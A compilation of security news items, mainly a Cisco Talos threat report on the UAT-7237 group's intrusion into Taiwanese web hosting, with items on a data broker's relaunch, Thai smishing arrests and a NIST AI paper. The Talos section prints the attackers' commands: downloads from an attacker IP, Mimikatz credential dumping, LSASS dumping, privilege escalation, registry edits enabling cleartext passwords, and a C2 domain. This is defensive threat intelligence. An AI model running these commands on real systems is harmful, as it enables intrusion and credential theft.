National Public Data has changed ownership. Does this mean your personal information has changed hands too?

Remember that data broker nobody had ever heard of, but managed to leak a database which contained the data of some 2.9 billion people? It’s back, and this time with a search function.

National Public Data suffered an alleged breach in 2024 against a data base that, it turned out, carried 272 million unique social security numbers (SSNs.) Granted, that there are limits to the safety of using a nine-digit ID in 2025, but the news that the folks at National Public Data have decided it’s time for a comeback made me slightly nauseous.

After the fall-out of the aforementioned leak and others, the site shut down in December amid a wave of lawsuits against parent company Jerico Pictures. But the people at PCMag noticed that the domain nationalpublidata\[.\]com has been brought back to life.

In an update page about the security incident, the new owner states:

> “Jerico Pictures, Inc., the Florida company that suffered a major data breach in 2024, no longer operates this site. We have zero affiliation with them.”

Data brokers scrape, collect, and aggregate data, combining disparate details into comprehensive dossiers. Sometimes your information ends up there because of public records. And sometimes it’s the result of poor security, or, as we see a lot unfortunately, a leak, ransomware attack, or other type of data breach.

On their “About us” page the new owners note:

> “We collect the data you find on our people search engine from publicly available sources, including federal, state, and local government agencies, social media pages, property ownership databases, and other reliable platforms. After the data is in our hands, we verify and filter it to make sure it is indeed accurate and up-to-date.”

Their goal:

> “National Public Data is a people search website where you can find accurate information about US citizens. Our database gives you access to millions of public records to help you find the data you need the most for various purposes. Privacy, speed, and ease of use are at the heart of what we do. Start your search today and discover what you can learn.”

If you live in the US, it might be prudent to check what information they have about you and where they might have scraped that from. Did you know you can have a lot of that information removed?

In the meantime, the “info spillers” are back, and they seem to be making up for lost time. The real question isn’t if your data is at risk. It’s what you’re going to do about it now.

**Protecting yourself after a data breach**

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

*   **Check the vendor’s advice.** Every breach is different, so check with the vendor to find out what’s happened and follow any specific advice they offer.
*   **Change your password.** You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
*   **Enable two-factor authentication (2FA).** If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
*   **Watch out for fake vendors.** The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims and verify the identity of anyone who contacts you using a different communication channel.
*   **Take your time.** Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
*   **Consider not storing your card details**. It’s definitely more convenient to get sites to remember your card details for you, but we highly recommend not storing that information on websites.
*   **Set up identity monitoring.** Identity monitoring alerts you if your personal information is found being traded illegally online and helps you recover after.

**We don’t just report on data privacy—we help you remove your personal information**

Cybersecurity risks should never spread beyond a headline. With Malwarebytes Personal Data Remover, you can scan to find out which sites are exposing your personal information, and then delete that sensitive data from the internet.

 National Public Data returns after massive Social Security Number leak 

A Chinese-speaking advanced persistent threat (APT) actor has been observed targeting web infrastructure entities in Taiwan using customized versions of open-sourced tools with an aim to establish long-term access within high-value victim environments.
The activity has been attributed by Cisco Talos to an activity cluster it tracks as UAT-7237, which is believed to be active since at least 2022.

Taiwan Web Servers Breached by UAT-7237 Using Customized Open-Source Hacking Tools

Thai police arrest SMS Blaster operator in smishing scam and bust crypto laundering gang moving $30M monthly through…

Thai police arrest SMS Blaster operator in smishing scam and bust crypto laundering gang moving $30M monthly through cross-border networks. Learn how law enforcement arrested on-the-ground scam operators with SMS blasters and dismantled a cross-border money laundering network.

A series of successful operations by Thai law enforcement has led to the disruption of two distinct cybercrime rings. In separate cases, police have targeted the low-level operators of physical scam equipment and a high-level, international money laundering network.

On Sunday, according to Thai daily newspaper Khaosod, the Technology Crime Suppression Division of the Thai police, in partnership with the country’s largest mobile provider, AIS, held a joint press conference to announce the arrest of two young Thai men in Bangkok. The pair, both in their early twenties, were caught with an SMS blaster, a device that can send more than 20,000 scam messages a day within a range of one to two kilometres.

The arrests were made on August 8 after a tip about a Mazda vehicle on New Petchburi Road. The duo admitted to driving the device around Bangkok on at least three occasions since August 2, claiming they were paid around $75 a day by a Chinese boss they communicated with on Telegram.

The scam messages used familiar themes like fake prize notifications or expiring loyalty points and directed victims to a fraudulent website designed to steal their banking information.

While the arrest highlights the direct threat of smishing scams, Thai authorities are also focused on dismantling the larger criminal organizations behind them.

Images via Khaosod

In a separate announcement, the Royal Thai Police revealed the results of Operation Skyfall, a major crackdown on a sophisticated money laundering network. This operation successfully dismantled a cross-border syndicate that used fake investment schemes to funnel over 1 billion baht ($30 million) monthly to a Chinese ringleader in Myanmar.

In this operation, police worked with cryptocurrency firm Binance to trace illicit funds that were moved through a complex network of digital currency transactions. The collaboration with Binance’s investigations team was crucial, as traditional banking methods would have been unable to follow the digital trail.

Investigation found that victims were lured into downloading a fake app called Ulela Max and transferring money that was then converted into the cryptocurrency USDT. This laundered money was routed through various accounts in Cambodia before reaching the leader.

The operation resulted in 28 arrest warrants and the seizure of cash worth 46 million baht (around $1.4 million), which was confiscated from three Myanmar nationals who were preparing to smuggle the funds.

The success of both operations underlines the need for new strategies to fight cybercrime. While seizing equipment like SMS blasters may effectively stop scams, authorities recognise that it is not a complete solution, as criminal bosses can easily hire new people and acquire new equipment. Therefore, the focus is now on a more proactive approach, like making their possession illegal and using border controls to prevent them from entering the country.

Police Bust Crypto Scammers, Nab Smishing SMS Blaster Operator

Cybersecurity-focused leadership delivers better products and business outcomes.

Using Security Expertise to Bridge the Communication Gap

Water and wastewater systems have become a favored target of nation-state actors, drawing increasing scrutiny following attacks on systems in multiple countries.

Water Systems Under Attack: Norway, Poland Blame Russia Actors

The U.S. Department of the Treasury's Office of Foreign Assets Control (OFAC) on Thursday renewed sanctions against Russian cryptocurrency exchange platform Garantex for facilitating ransomware actors and other cybercriminals by processing more than $100 million in transactions linked to illicit activities since 2019.
The Treasury said it's also imposing sanctions on Garantex's successor, Grinex

U.S. Sanctions Garantex and Grinex Over $100M in Ransomware-Linked Illicit Crypto Transactions

We used to think of privacy as a perimeter problem: about walls and locks, permissions, and policies. But in a world where artificial agents are becoming autonomous actors — interacting with data, systems, and humans without constant oversight — privacy is no longer about control. It’s about trust. And trust, by definition, is about what happens when you’re not looking.
Agentic AI — AI that

Zero Trust + AI: Privacy in the Age of Agentic AI

Cisco Talos discovered UAT-7237, a Chinese-speaking advanced persistent threat (APT) group active since at least 2022, which has significant overlaps with UAT-5918.

*   Cisco Talos discovered UAT-7237, a Chinese-speaking advanced persistent threat (APT) group active since at least 2022, which has significant overlaps with UAT-5918.
*   UAT-7237 conducted a recent intrusion targeting web infrastructure entities within Taiwan and relies heavily on the use of open-sourced tooling, customized to a certain degree, likely to evade detection and conduct malicious activities within the compromised enterprise.
*   UAT-7237 aims to establish long-term persistence in high-value victim environments.
*   Talos also identified a customized Shellcode loader in UAT-7237's arsenal that we track as “SoundBill.” SoundBill can be used to decode and load any shellcode, including Cobalt Strike.

Talos assesses with high confidence that UAT-7237 is a Chinese-speaking APT group, focusing heavily on establishing long-term persistence in web infrastructure entities in Taiwan. Most of UAT-7237's tooling consists of open-sourced tools, customized to a certain extent, including the use of a customized Shellcode loader we track as “SoundBill.”

Talos further assesses that UAT-7237 is likely a subgroup of UAT-5918, operating under the same umbrella of threat actors. UAT-7237's tooling, victimology and dates of activity overlap significantly with UAT-5918. Additionally, both threat groups develop, customize and operate tooling using the Chinese language as their preliminary language of choice.

While Talos assesses that UAT-7237 is a subgroup of UAT-5918, there are some deviations in UAT-7237's tactics, techniques and procedures (TTPs) that necessitate its designation as a distinct threat actor:

*   UAT-7237 primarily relies on the use of Cobalt Strike as its staple backdoor implant while UAT-5918 relies primarily on Meterpreter based reverse shells.
*   After a successful compromise, UAT-5918 typically deploys a flurry of web shells. However, UAT-7237's deployment of web shells is highly selective and only on a chosen few compromised endpoints.
*   While UAT-5918 relies on web shells as their primary channel of backdoor access, UAT-7237 relies on a combination of direct remote desktop protocol (RDP) access and SoftEther VPN clients to achieve the same.

In a recent intrusion, UAT-7237 compromised, infiltrated and established long term persistence in a Taiwanese web hosting provider. It is worth noting that the threat actor had a particular interest in gaining access to the victim organization’s VPN and cloud infrastructure. UAT-7237 used open-source and customized tooling to perform several malicious operations in the enterprise, including reconnaissance, credential extraction, deploying bespoke malware, setting up backdoored access via VPN clients, network scanning and proliferation.

**Initial access and reconnaissance**

UAT-7237 gains initial access by exploiting known vulnerabilities on unpatched servers exposed to the internet. Once the target has been successfully compromised, UAT-7237, like any other stealth-oriented APT, conducts rapid fingerprinting to evaluate if the target is worth conducting further malicious actions on.

Reconnaissance consists of identifying remote hosts, both internal and on the internet:

cmd /c nslookup <victim’s\_domain>
cmd /c systeminfo
cmd /c curl
cmd /c ping 8\[.\]8\[.\]8\[.\]8                            
cmd /c ping 141\[.\]164\[.\]50\[.\]141          // Attacker controlled remote server.
cmd /c ping <victim’s\_domain>
cmd /c ipconfig /all

While UAT-5918 immediately begins deploying web shells to establish backdoored channels of access, UAT-7237 deviates significantly, using the SoftEther VPN client (similar to Flax Typhoon) to persist their access, and later access the systems via RDP:

cmd /c c:\\temp\\WM7Lite\\download\[.\]exe  hxxp\[://\]141\[.\]164\[.\]50\[.\]141/sdksdk608/win-x64\[.\]rar c:\\temp\\WM7Lite\\1\[.\]rar

powershell (new-object System\[.\]Net\[.\]WebClient).DownloadFile('hxxp\[://\]141\[.\]164\[.\]50\[.\]141/sdksdk608/vpn\[.\]rar','C:\\Windows\\Temp\\vmware-SYSTEM\\vmtools\[.\]rar')

Once UAT-7237 sets up initial access, reconnaissance and VPN-based access, they start preparing to pivot to additional systems in the enterprise to proliferate and conduct malicious activities:

cmd\[.\]exe /c cd /d "<remote\_smb\_share>"&net use
cmd\[.\]exe /c cd /d "<remote\_smb\_share>"&dir \\\\<remote\_smb\_share>\\c$\\
cmd\[.\]exe /c cd /d "C:\\"&net group "domain admins" /domain
cmd\[.\]exe /c cd /d "C:\\"&net group "domain controllers" /domain

In addition to relying on living-off-the-land binaries (LOLBins), UAT-7237 actively employed Windows Management Instrumentation (WMI) based tooling during reconnaissance and proliferation such as SharpWMI and WMICmd:

cmd\[.\]exe /c cd /d "C:\\"&C:\\ProgramData\\dynatrace\\sharpwmi\[.\]exe <IP> <user> <pass> cmd whoami

cmd.exe /c cd /d "C:\\DotNet\\"&WMIcmd.exe

wmic /node:<IP> /user:Administrator /password:<pass> process call create cmd.exe /c whoami
  
wmic /node:<IP> /user:Administrator /password:<pass> process call create cmd.exe /c netstat -ano >c:\\1.txt

 SharpWMI and WMICmd can both be used to execute WMI queries on remote hosts, and they allow for arbitrary command and code executions.

UAT-7237 fingerprinted any systems subsequently accessed using rudimentary window commands such as:

cmd.exe /c systeminfo
cmd.exe /c tasklist
cmd.exe /c net1 user /domain
cmd.exe /c whoami /priv
cmd.exe /c quser

**Post-compromise tooling and actions on objectives****SoundBill**

After compromise, UAT-7237 deploys a variety of customized and open-source tooling to perform a variety of tasks on the infected endpoints. Talos tracks one of UAT-7237's custom-built tools as “SoundBill.” SoundBill is built based on  “VTHello” and is a shellcode loader written in Chinese that will decode a file on disk named “ptiti.txt” and execute the resulting shellcode.

It is also worth noting that SoundBill contains two embedded executables. Both originate from QQ, a Chinese instant messaging software, and are likely used as decoy files in attacks involving spear phishing.

SoundBill’s payload (i.e., the shellcode) may be anything from, for example, a customized implementation of Mimikatz:

VTSB.exe privilege::debug sekurlsa::logonpasswords exit

Or it may be a mechanism to execute arbitrary commands on the infected system, such as:

c:\\temp\\vtsb.exe -c whoami

The shellcode may even be a position-independent Cobalt Strike payload that allows UAT-7237 to establish long term access for information stealing. So far, the Cobalt Strike beacons Talos have found to be compatible with SoundBill communicate over HTTPS with its command and control (C2): cvbbonwxtgvc3isfqfc52cwzja0kvuqd.lambda-url.ap-northeast-1\[.\]on\[.\]aws

**JuicyPotato**

UAT-7237 also uses JuicyPotato, a privilege escalation tool popular with Chinese-speaking threat actors, to execute multiple commands on endpoints such as:

cmd.exe /c c:\\hotfix\\juicy2.exe -t \* -c {6d18ad12-bde3-4393-b311-099c346e6df9} -p whoami

**Configuration changes**

During intrusions on several occasions, UAT-7237 attempted to make configuration and setting changes to the Windows OS on the infected endpoints, such as disabling User Account Control (UAC) restriction via registry:

reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\system /v LocalAccountTokenFilterPolicy /t REG\_DWORD /d 1 /f

They also attempted to enable storage of cleartext passwords:

reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG\_DWORD /d 1 /f

UAT-7237 also accessed the Component Services management console, likely to adjust privileges for their malicious components:

mmc comexp.msc

**UAT-7237's pursuit of credentials**

UAT-7237 uses several mechanisms, predominantly Mimikatz, to extract credentials from the infected endpoints. However, the threat actor has evolved their use of Mimikatz over time, likely as a means of evading detection by using a Mimikatz instance built into SoundBill to extract credentials:

**Filename/command**

**Tooling name**

abc.dll

Comsvcs.dll for LSASS process dumping

Fileless.exe

Mimikatz

VTSB.exe privilege::debug sekurlsa::logonpasswords exit

SoundBill with the Mimikatz payload

Furthermore, UAT-7237 also finds VNC credentials and configuration from infected endpoints by searching the registry and disk:

reg query "HKCU\\Software\\ORL\\WinVNC3\\Password"
dir c:\\\*vnc.ini /s /b

Another (likely open-source) tool is used to execute commands on the endpoint, specifically to invoke a BAT file and another executable — again for credential extraction:

cmd.exe /c C:\\hotfix\\invoketest.exe  -cmd "cmd /c  C:\\hotfix\\1.bat"
cmd.exe /c C:\\hotfix\\invoketest.exe  -cmd "cmd /c   C:\\hotfix\\Project1.exe  C:\\hotfix\\SSP.dll"

“Project1\[.\]exe” above is the ssp\_dump\_lsass project on GitHub. It takes a DLL file as an argument, injects it into the Local Security Authority Service (LSASS)  process, which then dumps the LSASS process into a BIN file.

Optionally, JuicyPotato may be used to run the same credential extraction process via the BAT file:

cmd.exe /c c:\\hotfix\\juicy2.exe -t \* -c  {e60687f7-01a1-40aa-86ac-db1cbf673334} -p "c:\\windows\\system32\\cmd.exe"  -a "/c c:\\hotfix\\1.bat"

The process dump obtained is then staged into an archive for exfiltration:

cmd.exe /c "c:\\program files\\7-Zip\\7z.exe"  a  C:\\hotfix\\1.zip  C:\\hotfix\\1.bin

**Proliferating through the enterprise**

UAT-7237 uses the following network scanning tooling:

**FScan:** A network scanner tool used to scan for open ports against IP subnets:

fileless -h 10.30.111.1/24 -nopoc -t 20

**SMB scans:** To identify SMB services information on specific endpoints:

smb\_version 10.30.111.11 445

As soon as accessible systems are found, UAT-7237 will conduct additional recon to pivot to them using credentials they’ve extracted previously:

cmd\[.\]exe /c netstat -ano |findstr 3389
cmd\[.\]exe /c nslookup <victim’s\_subdomains>
cmd\[.\]exe /c net use  <IP>\\ipc$ <pass>  /user:<userid>
cmd\[.\]exe /c dir   \\\\<remote\_system>\\c$
cmd\[.\]exe /c net use  \\\\<remote\_system>\\ipc$ /del

**SoftEther VPN**

The remote server hosting the SoftEther VPN client consisted of two archives: one containing the Client executable and corresponding configuration, and another with the Executable and Linkable Format (ELF)-based server binary.

Talos' analysis of the SoftEther artifacts led to the following observations of UAT-7237's TTPs:

*   The server was created in September 2022 and was last used in December 2024, indicating that UAT-7237 may have been using SoftEther over a two-year period.
*   UAT-7237 specified Simplified Chinese as the preferred display language in their VPN client’s language configuration file, indicating that the operators were proficient with the language.

**Coverage**

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles.  Secure Access provides seamless transparent and secure access to the internet, cloud services or private application no matter where your users work.  Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access.

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

The following Snort rules cover this threat:

*   Snort v2 : 64908 - 64916
*   Snort v3: 301209 - 301212

**IOCs**

 IOCs for this research can also be found at our GitHub repository here. 

450fa9029c59af9edf2126df1d6a657ee6eb024d0341b32e6f6bdb8dc04bae5a - C:\\temp\\wmiscan.exe
6a72e4b92d6a459fc2c6054e9ddb9819d04ed362bd847333492410b6d7bae5aa - c:/hotfix/Project1.exe - ssp\_dump\_lsass tool
E106716a660c751e37cfc4f4fbf2ea2f833e92c2a49a0b3f40fc36ad77e0a044 - C:/hotfixlog/Fileless.exe - FScan
B52bf5a644ae96807e6d846b0ce203611d83cc8a782badc68ac46c9616649477 - C:/hotfixlog/smb\_version.exe
864e67f76ad0ce6d4cc83304af4347384c364ca6735df0797e4b1ff9519689c5 – fileless.exe - Mimikatz
 
SoundBill
Df8497b9c37b780d6b6904a24133131faed8ea4cf3d75830b53c25d41c5ea386
 
Cobalt Strike
0952e5409f39824b8a630881d585030a1d656db897adf228ce27dd9243db20b7
7a5f05da3739ad3e11414672d01b8bcf23503a9a8f1dd3f10ba2ead7745cdb1f
 
cvbbonwxtgvc3isfqfc52cwzja0kvuqd.lambda-url.ap-northeast-1\[.\]on\[.\]aws
http\[://\]141\[.\]164\[.\]50\[.\]141/sdksdk608/win-x64\[.\]rar
141\[.\]164\[.\]50\[.\]141

UAT-7237 targets Taiwanese web hosting infrastructure

NIST has released a concept paper for new control overlays to secure AI systems, built on the SP…

NIST has released a concept paper for new control overlays to secure AI systems, built on the SP 800-53 framework. Learn what the new framework covers and why experts are calling for more detailed descriptions.

In a significant step towards managing the security risks of artificial intelligence (AI), the National Institute of Standards and Technology (NIST) has released a new concept paper that proposes a framework of control overlays for securing AI systems.

This framework is built upon the well-known NIST Special Publication (SP) 800-53, which many organizations are already familiar with for managing cybersecurity risks, while these overlays are essentially a set of cybersecurity guidelines to help organizations.

The concept paper (PDF) lays out several scenarios for how these guidelines could be used to protect different types of AI. The paper defines a control overlay as a way to customize security controls for a specific technology, making the guidelines flexible for different AI applications. It also includes security controls specifically for AI developers, drawing from existing standards like NIST 800-53.

In this image, NIST has identified use cases for organizations using AI, such as with generative AI, predictive AI, and agentic AI systems.

Source: NIST

While the move is seen as a positive start, it’s not without its critics. Melissa Ruzzi, Director of AI at AppOmni, shared her thoughts on the paper with Hackread.com, suggesting that the guidelines need to be more specific to be truly useful. Ruzzi believes the use cases are a good starting point, but lack detailed descriptions.

“The use cases seem to capture the most popular AI implementations,” she said, “but they need to be more explicitly described and defined…” She points out that different types of AI, such as those that are “supervised” versus “unsupervised,” have different needs.

She also emphasizes the importance of data sensitivity. According to Ruzzi, the guidelines should include more specific controls and monitoring based on the type of data being used, like personal or medical information. This is crucial, as the paper’s goal is to protect the confidentiality, integrity, and availability of information for each use case.

Ruzzi’s comments highlight a key challenge in creating a one-size-fits-all security framework for a technology that is evolving so quickly. The NIST paper is an initial step, and the organization is now asking for feedback from the public to help shape its final version.

It has even launched a Slack channel where experts and community members can join the conversation and contribute to the development of these new security guidelines. This collaborative approach shows that NIST is serious about creating a framework that is both comprehensive and practical for the real world.

New NIST Concept Paper Outlines AI-Specific Cybersecurity Framework

**What is the version information for this release?**

Microsoft Edge Version

Date Released

Based on Chromium Version

139.0.3405.102

8/15/2025

139.0.7258.127/.128

Latest News